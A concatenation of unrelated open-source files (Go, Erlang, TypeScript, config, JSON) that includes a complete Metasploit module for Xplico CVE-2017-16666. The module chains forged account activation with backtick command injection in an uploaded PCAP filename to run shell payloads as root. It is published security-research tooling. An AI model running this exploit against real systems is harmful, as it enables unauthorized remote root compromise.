putStrLn $ "file not found in tag: " ++ t ++ ": " ++ f
exitFailure
| {
"pile_set_name": "Github"
} |
{
"sessions": {
"title": "Sesiuni active pentru [<strong>{{username}}</strong>]",
"table": {
"ipaddress": "Adresa IP",
"useragent": "User Agent",
"date": "Data",
"button": "Invalidare"
},
"messages": {
"success": "<strong>Sesiune invalidată!</strong>",
"error": "<strong>Eroare!</strong> Sesiunea nu a putut fi invalidată."
}
}
}
| {
"pile_set_name": "Github"
} |
// Copyright 2014 Canonical Ltd.
// Licensed under the LGPLv3, see LICENCE file for details.
package utils_test
import (
"os"
"github.com/juju/testing"
gc "gopkg.in/check.v1"
"github.com/juju/utils/v2"
)
type gomaxprocsSuite struct {
testing.IsolationSuite
setmaxprocs chan int
numCPUResponse int
setMaxProcs int
}
var _ = gc.Suite(&gomaxprocsSuite{})
func (s *gomaxprocsSuite) SetUpTest(c *gc.C) {
s.IsolationSuite.SetUpTest(c)
// always stub out GOMAXPROCS so we don't actually change anything
s.numCPUResponse = 2
s.setMaxProcs = -1
maxProcsFunc := func(n int) int {
s.setMaxProcs = n
return 1
}
numCPUFunc := func() int { return s.numCPUResponse }
s.PatchValue(utils.GOMAXPROCS, maxProcsFunc)
s.PatchValue(utils.NumCPU, numCPUFunc)
s.PatchEnvironment("GOMAXPROCS", "")
}
func (s *gomaxprocsSuite) TestUseMultipleCPUsDoesNothingWhenGOMAXPROCSSet(c *gc.C) {
os.Setenv("GOMAXPROCS", "1")
utils.UseMultipleCPUs()
c.Check(s.setMaxProcs, gc.Equals, 0)
}
func (s *gomaxprocsSuite) TestUseMultipleCPUsWhenEnabled(c *gc.C) {
utils.UseMultipleCPUs()
c.Check(s.setMaxProcs, gc.Equals, 2)
s.numCPUResponse = 4
utils.UseMultipleCPUs()
c.Check(s.setMaxProcs, gc.Equals, 4)
}
| {
"pile_set_name": "Github"
} |
import { Module } from '@nestjs/common';
import { TypeOrmModule } from '@nestjs/typeorm';
import { CandidateInterviewService } from './candidate-interview.service';
import { CandidateInterviewController } from './candidate-interview.controller';
import { CandidateInterview } from './candidate-interview.entity';
import { UserService } from '../user/user.service';
import { User } from '../user/user.entity';
@Module({
imports: [TypeOrmModule.forFeature([CandidateInterview, User])],
providers: [CandidateInterviewService, UserService],
controllers: [CandidateInterviewController],
exports: [CandidateInterviewService]
})
export class CandidateInterviewModule {}
| {
"pile_set_name": "Github"
} |
3 2
50 85 250
10 15 25
3 6
50 85 250
10 15 25
8 1
10 20 30 40 50 60 70 80
8 10 58 63 71 72 75 76
| {
"pile_set_name": "Github"
} |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 2005-2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
%%
%% Description: This module impements handling of ftp server responses.
-module(ftp_response).
%% Internal API
-export([parse_lines/3, interpret/1, error_string/1]).
-include("ftp_internal.hrl").
%% First group of reply code digits
-define(POS_PREL, 1).
-define(POS_COMPL, 2).
-define(POS_INTERM, 3).
-define(TRANS_NEG_COMPL, 4).
-define(PERM_NEG_COMPL, 5).
%% Second group of reply code digits
-define(SYNTAX,0).
-define(INFORMATION,1).
-define(CONNECTION,2).
-define(AUTH_ACC,3).
-define(UNSPEC,4).
-define(FILE_SYSTEM,5).
%%%=========================================================================
%%% INTERNAL API
%%%=========================================================================
%%--------------------------------------------------------------------------
%% parse_lines(Data, AccLines, StatusCode) -> {ok, Lines} |
%% {continue, {Data,
%% AccLines, StatusCode}}
%%
%% Data = binary() - data recived on the control connection from the
%% ftp-server.
%% AccLines = [string()]
%% StatusCode = start | {byte(), byte(), byte()} | finish -
%% Indicates where in the parsing process we are.
%% start - (looking for the status code of the message)
%% {byte(), byte(), byte()} - status code found, now
%% looking for the last line indication.
%% finish - now on the last line.
%% Description: Parses a ftp control response message.
%% "A reply is defined to contain the 3-digit code, followed by Space
%% <SP>, followed by one line of text (where some maximum line length
%% has been specified), and terminated by the Telnet end-of-line
%% code (CRLF), or a so called multilined reply for example:
%%
%% 123-First line
%% Second line
%% 234 A line beginning with numbers
%% 123 The last line
%%
%% The user-process then simply needs to search for the second
%% occurrence of the same reply code, followed by <SP> (Space), at
%% the beginning of a line, and ignore all intermediary lines. If
%% an intermediary line begins with a 3-digit number, the Server
%% will pad the front to avoid confusion.
%%--------------------------------------------------------------------------
%% Make sure we received the first 4 bytes so we know how to parse
%% the FTP server response e.i. is the response composed of one
%% or multiple lines.
parse_lines(Bin, Lines, start) when size(Bin) < 4 ->
{continue, {Bin, Lines, start}};
%% Multiple lines exist
parse_lines(<<C1, C2, C3, $-, Rest/binary>>, Lines, start) ->
parse_lines(Rest, [$-, C3, C2, C1 | Lines], {C1, C2, C3});
%% Only one line exists
parse_lines(<<C1, C2, C3, ?WHITE_SPACE, Bin/binary>>, Lines, start) ->
parse_lines(Bin, [?WHITE_SPACE, C3, C2, C1 | Lines], finish);
%% Last line found
parse_lines(<<?CR, ?LF, C1, C2, C3, ?WHITE_SPACE, Rest/binary>>, Lines, {C1, C2, C3}) ->
parse_lines(Rest, [?WHITE_SPACE, C3, C2, C1, ?LF, ?CR | Lines], finish);
%% Potential end found wait for more data
parse_lines(<<?CR, ?LF, C1, C2, C3>> = Bin, Lines, {C1, C2, C3}) ->
{continue, {Bin, Lines, {C1, C2, C3}}};
%% Intermidate line begining with status code
parse_lines(<<?CR, ?LF, C1, C2, C3, Rest/binary>>, Lines, {C1, C2, C3}) ->
parse_lines(Rest, [C3, C2, C1, ?LF, ?CR | Lines], {C1, C2, C3});
%% Potential last line wait for more data
parse_lines(<<?CR, ?LF, C1, C2>> = Data, Lines, {C1, C2, _} = StatusCode) ->
{continue, {Data, Lines, StatusCode}};
parse_lines(<<?CR, ?LF, C1>> = Data, Lines, {C1, _, _} = StatusCode) ->
{continue, {Data, Lines, StatusCode}};
parse_lines(<<?CR, ?LF>> = Data, Lines, {_,_,_} = StatusCode) ->
{continue, {Data, Lines, StatusCode}};
parse_lines(<<?LF>> = Data, Lines, {_,_,_} = StatusCode) ->
{continue, {Data, Lines, StatusCode}};
parse_lines(<<>> = Data, Lines, {_,_,_} = StatusCode) ->
{continue, {Data, Lines, StatusCode}};
%% Part of the multiple lines
parse_lines(<<Octet, Rest/binary>>, Lines, {_,_, _} = StatusCode) ->
parse_lines(Rest, [Octet | Lines], StatusCode);
%% End of FTP server response found
parse_lines(<<?CR, ?LF>>, Lines, finish) ->
{ok, lists:reverse([?LF, ?CR | Lines]), <<>>};
parse_lines(<<?CR, ?LF, Rest/binary>>, Lines, finish) ->
{ok, lists:reverse([?LF, ?CR | Lines]), Rest};
%% Potential end found wait for more data
parse_lines(<<?CR>> = Data, Lines, finish) ->
{continue, {Data, Lines, finish}};
parse_lines(<<>> = Data, Lines, finish) ->
{continue, {Data, Lines, finish}};
%% Part of last line
parse_lines(<<Octet, Rest/binary>>, Lines, finish) ->
parse_lines(Rest, [Octet | Lines], finish).
%%--------------------------------------------------------------------------
%% interpret(Lines) -> {Status, Text}
%% Lines = [byte(), byte(), byte() | Text] - ftp server response as
%% returned by parse_lines/3
%% Stauts = atom() (see interpret_status/3)
%% Text = [string()]
%%
%% Description: Create nicer data to match on.
%%--------------------------------------------------------------------------
interpret([Didgit1, Didgit2, Didgit3 | Data]) ->
Code1 = Didgit1 - $0,
Code2 = Didgit2 - $0,
Code3 = Didgit3 - $0,
{interpret_status(Code1, Code2, Code3), Data}.
%%--------------------------------------------------------------------------
%% error_string(Error) -> string()
%% Error = {error, term()} | term()
%%
%% Description: Translates error codes into strings intended for
%% human interpretation.
%%--------------------------------------------------------------------------
error_string({error, Reason}) ->
error_string(Reason);
error_string(echunk) -> "Synchronisation error during chunk sending.";
error_string(eclosed) -> "Session has been closed.";
error_string(econn) -> "Connection to remote server prematurely closed.";
error_string(eexists) ->"File or directory already exists.";
error_string(ehost) -> "Host not found, FTP server not found, "
"or connection rejected.";
error_string(elogin) -> "User not logged in.";
error_string(enotbinary) -> "Term is not a binary.";
error_string(epath) -> "No such file or directory, already exists, "
"or permission denied.";
error_string(etype) -> "No such type.";
error_string(euser) -> "User name or password not valid.";
error_string(etnospc) -> "Insufficient storage space in system.";
error_string(enofile) -> "No files found or file unavailable";
error_string(epnospc) -> "Exceeded storage allocation "
"(for current directory or dataset).";
error_string(efnamena) -> "File name not allowed.";
error_string(Reason) ->
lists:flatten(io_lib:format("Unknown error: ~w", [Reason])).
%%%========================================================================
%%% Internal functions
%%%========================================================================
%% Positive Preleminary Reply
interpret_status(?POS_PREL,_,_) -> pos_prel;
%%FIXME ??? 3??? interpret_status(?POS_COMPL, ?AUTH_ACC, 3) -> tls_upgrade;
interpret_status(?POS_COMPL, ?AUTH_ACC, 4) -> tls_upgrade;
%% Positive Completion Reply
interpret_status(?POS_COMPL,_,_) -> pos_compl;
%% Positive Intermediate Reply nedd account
interpret_status(?POS_INTERM,?AUTH_ACC,2) -> pos_interm_acct;
%% Positive Intermediate Reply
interpret_status(?POS_INTERM,_,_) -> pos_interm;
%% No files found or file not available
interpret_status(?TRANS_NEG_COMPL,?FILE_SYSTEM,0) -> enofile;
%% No storage area no action taken
interpret_status(?TRANS_NEG_COMPL,?FILE_SYSTEM,2) -> etnospc;
%% Temporary Error, no action taken
interpret_status(?TRANS_NEG_COMPL,_,_) -> trans_neg_compl;
%% Permanent disk space error, the user shall not try again
interpret_status(?PERM_NEG_COMPL,?FILE_SYSTEM,0) -> epath;
interpret_status(?PERM_NEG_COMPL,?FILE_SYSTEM,2) -> epnospc;
interpret_status(?PERM_NEG_COMPL,?FILE_SYSTEM,3) -> efnamena;
interpret_status(?PERM_NEG_COMPL,?AUTH_ACC,0) -> elogin;
interpret_status(?PERM_NEG_COMPL,_,_) -> perm_neg_compl.
| {
"pile_set_name": "Github"
} |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Xplico Remote Code Execution',
'Description' => %q{
This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal
command under the context of the root user.
The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet
traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create
a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try
to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.
But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.
One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum
of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <[email protected]>' # author & msf module
],
'References' =>
[
['CVE', '2017-16666'],
['URL', 'https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/'],
['URL', 'https://www.xplico.org/archives/1538']
],
'Privileged' => true,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'RPORT' => 9876
},
'Payload' =>
{
'Space' => 252,
'DisableNops' => true,
'BadChars' => "\x2f\x22",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat gawk', # other cmd payloads can't fit within 252 space due to badchars.
},
},
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Oct 29 2017',
'DefaultTarget' => 0
))
end
def check
# There is no exact way to understand validity of vulnerability without registering new user as well as trigger the command injection.
# which is not something we want to do for only check..!
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
)
if res && res.code == 302
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Unknown
end
end
def initiate_session
print_status('Initiating new session on server side')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
)
if res && res.code == 200
res.get_cookies
else
nil
end
end
def register_user(username, password)
# First thing first, we need to get csrf token from registration form.
print_status('Registering a new user')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
'cookie' => @cookie
)
if res && res.code == 200
csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
end
if csrf_token.nil? || fields.nil?
fail_with(Failure::Unknown, 'Unable to extact hidden fields from registration form.')
end
# rand_mail_address sometimes generates buggy email address for this app. So we manually generate email address in here.
email = ''
email << rand_text_alpha_lower(rand(10)+4)
email << '@'
email << rand_text_alpha_lower(rand(10)+4)
email << '.'
email << rand_text_alpha_lower(rand(1)+2)
# Create user
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[_Token][key]' => csrf_token,
'data[User][email]' => email,
'data[User][username]' => username,
'data[User][password]' => password,
'data[_Token][fields]' => fields,
'data[_Token][unlocked]' => '',
}
)
if res && res.code == 302
print_good('New user successfully registered')
print_status("Username: #{username}")
print_status("Password: #{password}")
else
fail_with(Failure::Unknown, 'Could not register new user')
end
# Awesome. We have user. We need to activate it manually..!
print_status('Calculating em_key code of the user')
unixtime = Time.parse(res.headers['Date']).to_i
password_md5 = Rex::Text.md5(password)
em_key = Rex::Text.md5(
"#{email}#{password_md5}#{unixtime}"
)
print_status("Activating user with em_key = #{em_key}")
# We need to follow redirections. Even if we managed to find em_key.
# It will redirect us to the login form. We need to see registration completed on final page.
res = send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'registerConfirm', em_key),
'cookie' => @cookie
)
if res && res.code == 200 && res.body.include?('Registration Completed.')
print_good('User successfully activated')
else
fail_with(Failure::Unknown, 'Could not activated our user. Target may not be vulnerable.')
end
end
def login(username, password)
# yet another csrf token gathering.
print_status('Authenticating with our activated new user')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'cookie' => @cookie
)
if res && res.code == 200
csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
end
if csrf_token.nil? || fields.nil?
fail_with(Failure::Unknown, 'Unable to extact hidden fields from login form.')
end
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[_Token][key]' => csrf_token,
'data[User][username]' => username,
'data[User][password]' => password,
'data[_Token][fields]' => fields,
'data[_Token][unlocked]' => '',
}
)
if res && res.body.include?('<a href="/pols">Cases</a>')
print_good('Successfully authenticated')
else
fail_with(Failure::Unknown, 'Unable to login.')
end
end
def create_new_case
# We logged in. Not we need to create a new xplico case.
print_status('Creating new case')
pol_name = rand_text_alpha_lower(rand(4)+8)
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'pols', 'add'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[Capture][Type]' => 0,
'data[Pol][name]' => pol_name,
'data[Pol][external_ref]' => '',
}
)
if res && res.body.include?('The Case has been created')
res.body.scan(/<a href="\/pols\/view\/([0-9]+)">/).flatten[0]
else
nil
end
end
def create_new_sol(pol_id)
# Since we xplico case, it's time to create a "session" for this case.
print_status('Creating new xplico session for pcap')
sol_name = rand_text_alpha_lower(rand(4)+8)
# sols/add endpoint reads selected case id through session.
# So we need to hit that end-point so we can insert pol_id into the current session data.
send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'pols', 'view', pol_id),
'cookie' => @cookie,
)
# Creating new session.
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'sols', 'add'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[Sol][name]' => sol_name,
}
)
if res && res.body.include?('The Session has been created')
res.body.scan(/<a href="\/sols\/view\/([0-9]+)">/).flatten[0]
else
nil
end
end
def upload_pcap(sol_id)
print_status('Uploading malformed PCAP file')
# We are hitting this end-point so we can access sol_id through session on server-side.
send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
'cookie' => @cookie,
)
# Reading malformed pcap files.
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2017-16666', 'dump.pcap')
fd = ::File.open( path, 'rb')
pcap = fd.read(fd.stat.size)
fd.close
data = Rex::MIME::Message.new
data.add_part('POST', nil, nil, 'form-data; name="_method"')
data.add_part(pcap, 'application/octet-stream', nil, "form-data; name=\"data[Sols][File]\"; filename=\"`#{payload.encoded})`\"") # Yes back-tick injection!
# Uploading PCAP file.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'sols', 'pcap'),
'cookie' => @cookie,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
if res && res.code == 302
print_good('PCAP successfully uploaded. Pcap parser is going to start on server side.')
end
# We can not wait all the day long to have session.
# So we are checking status of decoding process 5 times with sleep for a 1 second on each loop.
is_job_done = nil
counter = 0
until session_created? || !is_job_done.nil? || counter == 5
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
'cookie' => @cookie,
)
if res && res.body.include?('File uploaded, wait start decoding...')
print_status('Parsing has started. Wait for parser to get the job done...')
end
if res && res.body.include?('DECODING')
print_good('We are at PCAP decoding phase. Little bit more patience...')
end
# Tbh decoding process is not going to be finished as long as we have msf session.
# We are not going to see this case if we are successful exploiting.
if res && res.body.include?('DECODING COMPLETED')
print_warning('PCAP parsing process has finished. Haven\'t you got your shell ?')
is_job_done = 1
next
end
sleep(1)
counter += 1
end
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
end
# We need to access cookie from everywhere. Thus making it global variable.
@cookie = initiate_session
if @cookie.nil?
fail_with(Failure::Unknown, 'Unable to initiate new sessionid on server.')
end
# We only need to access username and password for login func. Let's leave them as a local variables.
password = rand_text_alpha(32)
username = rand_text_alpha_lower(rand(8)+8)
register_user(username, password)
login(username, password)
# We will need to have pol_id for creating new xplico session.
pol_id = create_new_case
if pol_id.nil?
fail_with(Failure::Unknown, 'Unable to create New Case.')
end
print_good("New Case successfully creted. Our pol_id = #{pol_id}")
# Create xplico session by using pol_id
sol_id = create_new_sol(pol_id)
if sol_id.nil?
fail_with(Failure::Unknown, 'Unable to create New Sol.')
end
print_good("New Sols successfully creted. Our sol_id = #{sol_id}")
# Uploading malformed PCAP file. We are exploiting authenticated cmd inj in here.
upload_pcap(sol_id)
end
end
| {
"pile_set_name": "Github"
} |
-----BEGIN CERTIFICATE-----
MII=
MII=
MII= | {
"pile_set_name": "Github"
} |
declare module 'react-modal' {
declare module.exports: any;
}
| {
"pile_set_name": "Github"
} |
{
"name": "angular",
"version": "0.0.0",
"license": "MIT",
"scripts": {
"ng": "ng",
"start": "ng serve",
"build": "ng build --prod",
"test": "ng test",
"lint": "ng lint",
"e2e": "ng e2e"
},
"private": true,
"dependencies": {
"@angular/animations": "^5.2.0",
"@angular/common": "^5.2.0",
"@angular/compiler": "^5.2.0",
"@angular/core": "^5.2.0",
"@angular/forms": "^5.2.0",
"@angular/http": "^5.2.0",
"@angular/platform-browser": "^5.2.0",
"@angular/platform-browser-dynamic": "^5.2.0",
"@angular/router": "^5.2.0",
"core-js": "^2.4.1",
"rxjs": "^5.5.6",
"zone.js": "^0.8.19"
},
"devDependencies": {
"@angular/cli": "~1.7.1",
"@angular/compiler-cli": "^5.2.0",
"@angular/language-service": "^5.2.0",
"@types/jasmine": "~2.8.3",
"@types/jasminewd2": "~2.0.2",
"@types/node": "~6.0.60",
"codelyzer": "^4.0.1",
"jasmine-core": "~2.8.0",
"jasmine-spec-reporter": "~4.2.1",
"karma": "~2.0.0",
"karma-chrome-launcher": "~2.2.0",
"karma-coverage-istanbul-reporter": "^1.2.1",
"karma-jasmine": "~1.1.0",
"karma-jasmine-html-reporter": "^0.2.2",
"protractor": "~5.1.2",
"ts-node": "~4.1.0",
"tslint": "~5.9.1",
"typescript": "~2.5.3"
}
}
| {
"pile_set_name": "Github"
} |
{
"extends": "./tsconfig.json",
"compilerOptions": {
"outDir": "../../dist/out-tsc",
"module": "commonjs",
"types": ["jest", "node"]
},
"files": ["src/test-setup.ts"],
"include": ["**/*.spec.ts", "**/*.d.ts"]
}
| {
"pile_set_name": "Github"
} |
/* -----------------------------------------------------------------------------
* attribute.i
*
* SWIG library file for implementing attributes.
* ----------------------------------------------------------------------------- */
/* we use a simple exception warning here */
%{
#include <stdio.h>
%}
#define %attribute_exception(code,msg) printf("%s\n",msg)
#ifndef %arg
#define %arg(x...) x
#endif
#ifndef %mangle
#define %mangle(Type...) #@Type
#endif
%include <typemaps/attribute.swg>
| {
"pile_set_name": "Github"
} |
package jsonpb_gogo
| {
"pile_set_name": "Github"
} |
propel.targetPackage = classes.model
propel.packageObjectModel = true
propel.project = opensource
propel.database = mssql
propel.database.createUrl = mysql://root@localhost/
propel.database.url = mysql://root@localhost/rbac_os
propel.addGenericAccessors = true
propel.addGenericMutators = true
propel.addTimeStamp = false
propel.schema.validate = false
; directories
propel.home = .
propel.output.dir = .
propel.schema.dir = ${propel.output.dir}config
propel.conf.dir = ${propel.output.dir}config
propel.phpconf.dir = ${propel.output.dir}config
propel.sql.dir = ${propel.output.dir}data/mssql
propel.runtime.conf.file = runtime-conf.xml
propel.php.dir = ${propel.output.dir}
propel.default.schema.basename = schema
propel.datadump.mapper.from = *schema.xml
propel.datadump.mapper.to = *data.xml
; builder settings
;_propel.builder.peer.class = addon.propel.builder.SfPeerBuilder
;propel.builder.object.class = addon.propel.builder.SfObjectBuilder
;propel.builder.objectstub.class = addon.propel.builder.SfExtensionObjectBuilder
;propel.builder.peerstub.class = addon.propel.builder.SfExtensionPeerBuilder
;propel.builder.objectmultiextend.class = addon.propel.builder.SfMultiExtendObjectBuilder
;propel.builder.mapbuilder.class = addon.propel.builder.SfMapBuilderBuilder
propel.builder.interface.class = propel.engine.builder.om.php5.PHP5InterfaceBuilder
propel.builder.node.class = propel.engine.builder.om.php5.PHP5NodeBuilder
propel.builder.nodepeer.class = propel.engine.builder.om.php5.PHP5NodePeerBuilder
propel.builder.nodestub.class = propel.engine.builder.om.php5.PHP5ExtensionNodeBuilder
propel.builder.nodepeerstub.class = propel.engine.builder.om.php5.PHP5ExtensionNodePeerBuilder
propel.builder.addIncludes = false
propel.builder.addComments = false
propel.builder.addBehaviors = false
| {
"pile_set_name": "Github"
} |
#include "libm.h"
/* asinh(z) = -i asin(i z) */
double complex casinh(double complex z)
{
z = casin(CMPLX(-cimag(z), creal(z)));
return CMPLX(cimag(z), -creal(z));
}
| {
"pile_set_name": "Github"
} |
import _debug from 'debug'
const debug = _debug('peercalls')
export function getBrowserFeatures() {
const media =
'mediaDevices' in navigator &&
typeof navigator.mediaDevices === 'object' &&
typeof navigator.mediaDevices.getUserMedia === 'function' &&
typeof navigator.mediaDevices.enumerateDevices === 'function'
const mediaStream =
typeof MediaStream === 'function' && typeof MediaStreamTrack === 'function'
const buffers =
typeof TextEncoder === 'function' && typeof TextDecoder === 'function' &&
typeof ArrayBuffer === 'function' && typeof Uint8Array === 'function'
const insertableStreams =
typeof RTCRtpSender === 'function' &&
typeof RTCRtpSender.prototype.createEncodedStreams === 'function'
const webrtc =
typeof RTCPeerConnection === 'function' &&
typeof RTCPeerConnection.prototype == 'object' &&
typeof RTCPeerConnection.prototype.createDataChannel === 'function'
const websockets =
typeof WebSocket === 'function'
const webworkers =
typeof Worker === 'function'
const features = {
media,
mediaStream,
buffers,
insertableStreams,
webrtc,
websockets,
webworkers,
}
debug('browser features supported: %o', features)
return features
}
| {
"pile_set_name": "Github"
} |
// Copyright © 2013 Steve Francia <[email protected]>.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Package cobra is a commander providing a simple interface to create powerful modern CLI interfaces.
// In addition to providing an interface, Cobra simultaneously provides a controller to organize your application code.
package cobra
import (
"bytes"
"context"
"fmt"
"io"
"os"
"path/filepath"
"sort"
"strings"
flag "github.com/spf13/pflag"
)
// FParseErrWhitelist configures Flag parse errors to be ignored
type FParseErrWhitelist flag.ParseErrorsWhitelist
// Command is just that, a command for your application.
// E.g. 'go run ...' - 'run' is the command. Cobra requires
// you to define the usage and description as part of your command
// definition to ensure usability.
type Command struct {
// Use is the one-line usage message.
Use string
// Aliases is an array of aliases that can be used instead of the first word in Use.
Aliases []string
// SuggestFor is an array of command names for which this command will be suggested -
// similar to aliases but only suggests.
SuggestFor []string
// Short is the short description shown in the 'help' output.
Short string
// Long is the long message shown in the 'help <this-command>' output.
Long string
// Example is examples of how to use the command.
Example string
// ValidArgs is list of all valid non-flag arguments that are accepted in bash completions
ValidArgs []string
// ValidArgsFunction is an optional function that provides valid non-flag arguments for bash completion.
// It is a dynamic version of using ValidArgs.
// Only one of ValidArgs and ValidArgsFunction can be used for a command.
ValidArgsFunction func(cmd *Command, args []string, toComplete string) ([]string, ShellCompDirective)
// Expected arguments
Args PositionalArgs
// ArgAliases is List of aliases for ValidArgs.
// These are not suggested to the user in the bash completion,
// but accepted if entered manually.
ArgAliases []string
// BashCompletionFunction is custom functions used by the bash autocompletion generator.
BashCompletionFunction string
// Deprecated defines, if this command is deprecated and should print this string when used.
Deprecated string
// Hidden defines, if this command is hidden and should NOT show up in the list of available commands.
Hidden bool
// Annotations are key/value pairs that can be used by applications to identify or
// group commands.
Annotations map[string]string
// Version defines the version for this command. If this value is non-empty and the command does not
// define a "version" flag, a "version" boolean flag will be added to the command and, if specified,
// will print content of the "Version" variable. A shorthand "v" flag will also be added if the
// command does not define one.
Version string
// The *Run functions are executed in the following order:
// * PersistentPreRun()
// * PreRun()
// * Run()
// * PostRun()
// * PersistentPostRun()
// All functions get the same args, the arguments after the command name.
//
// PersistentPreRun: children of this command will inherit and execute.
PersistentPreRun func(cmd *Command, args []string)
// PersistentPreRunE: PersistentPreRun but returns an error.
PersistentPreRunE func(cmd *Command, args []string) error
// PreRun: children of this command will not inherit.
PreRun func(cmd *Command, args []string)
// PreRunE: PreRun but returns an error.
PreRunE func(cmd *Command, args []string) error
// Run: Typically the actual work function. Most commands will only implement this.
Run func(cmd *Command, args []string)
// RunE: Run but returns an error.
RunE func(cmd *Command, args []string) error
// PostRun: run after the Run command.
PostRun func(cmd *Command, args []string)
// PostRunE: PostRun but returns an error.
PostRunE func(cmd *Command, args []string) error
// PersistentPostRun: children of this command will inherit and execute after PostRun.
PersistentPostRun func(cmd *Command, args []string)
// PersistentPostRunE: PersistentPostRun but returns an error.
PersistentPostRunE func(cmd *Command, args []string) error
// SilenceErrors is an option to quiet errors down stream.
SilenceErrors bool
// SilenceUsage is an option to silence usage when an error occurs.
SilenceUsage bool
// DisableFlagParsing disables the flag parsing.
// If this is true all flags will be passed to the command as arguments.
DisableFlagParsing bool
// DisableAutoGenTag defines, if gen tag ("Auto generated by spf13/cobra...")
// will be printed by generating docs for this command.
DisableAutoGenTag bool
// DisableFlagsInUseLine will disable the addition of [flags] to the usage
// line of a command when printing help or generating docs
DisableFlagsInUseLine bool
// DisableSuggestions disables the suggestions based on Levenshtein distance
// that go along with 'unknown command' messages.
DisableSuggestions bool
// SuggestionsMinimumDistance defines minimum levenshtein distance to display suggestions.
// Must be > 0.
SuggestionsMinimumDistance int
// TraverseChildren parses flags on all parents before executing child command.
TraverseChildren bool
// FParseErrWhitelist flag parse errors to be ignored
FParseErrWhitelist FParseErrWhitelist
ctx context.Context
// commands is the list of commands supported by this program.
commands []*Command
// parent is a parent command for this command.
parent *Command
// Max lengths of commands' string lengths for use in padding.
commandsMaxUseLen int
commandsMaxCommandPathLen int
commandsMaxNameLen int
// commandsAreSorted defines, if command slice are sorted or not.
commandsAreSorted bool
// commandCalledAs is the name or alias value used to call this command.
commandCalledAs struct {
name string
called bool
}
// args is actual args parsed from flags.
args []string
// flagErrorBuf contains all error messages from pflag.
flagErrorBuf *bytes.Buffer
// flags is full set of flags.
flags *flag.FlagSet
// pflags contains persistent flags.
pflags *flag.FlagSet
// lflags contains local flags.
lflags *flag.FlagSet
// iflags contains inherited flags.
iflags *flag.FlagSet
// parentsPflags is all persistent flags of cmd's parents.
parentsPflags *flag.FlagSet
// globNormFunc is the global normalization function
// that we can use on every pflag set and children commands
globNormFunc func(f *flag.FlagSet, name string) flag.NormalizedName
// usageFunc is usage func defined by user.
usageFunc func(*Command) error
// usageTemplate is usage template defined by user.
usageTemplate string
// flagErrorFunc is func defined by user and it's called when the parsing of
// flags returns an error.
flagErrorFunc func(*Command, error) error
// helpTemplate is help template defined by user.
helpTemplate string
// helpFunc is help func defined by user.
helpFunc func(*Command, []string)
